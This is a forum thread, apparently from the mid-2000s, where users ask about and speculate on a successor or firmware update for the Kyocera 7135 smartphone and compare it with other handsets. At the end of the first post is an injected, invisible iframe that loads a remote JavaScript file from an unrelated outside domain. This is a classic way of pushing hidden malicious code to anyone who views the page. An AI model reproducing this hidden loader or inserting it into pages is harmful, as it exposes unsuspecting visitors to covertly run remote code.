new 7135

i am in the market for a smartphone and am presented with many options. i have flexibility in terms of carrier and brand. i am considering the treo 600, and the sony ericsson p900. both are candy bar form factor. i love verizon for it service and have contemplated a 7135 many times. unforetantely as one of the first models into this market i worry it is a little dated now. so my question to the group is are there any rumors, gossip or intel on a new 7135, either firmware upgrades or total revisons to model?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think the new "7135" or better yet the "8235" will be a while in coming out concidering how long it took the current 7135 to get to market.

As for firmware updates, I think there is one that just came out that addresses some of the problems that people were having. I believe it is somewhat difficult to find a store that has, and more importantly, knows how to install the firmware update.

I have also read on some thread from here on SMS, that kyocera has done some changes to the most current phones being shipped (ie. better button feel and response, and other small changes).

I dont think the phone is dated at all...The are only a few phones out there that can do the things that this phone can do, and fewer still that are in a clam/flip design. (I personally, will NEVER buy another phone that is not clam/flip.)

One would hope so. Only the development gods at Kyocera know for sure.
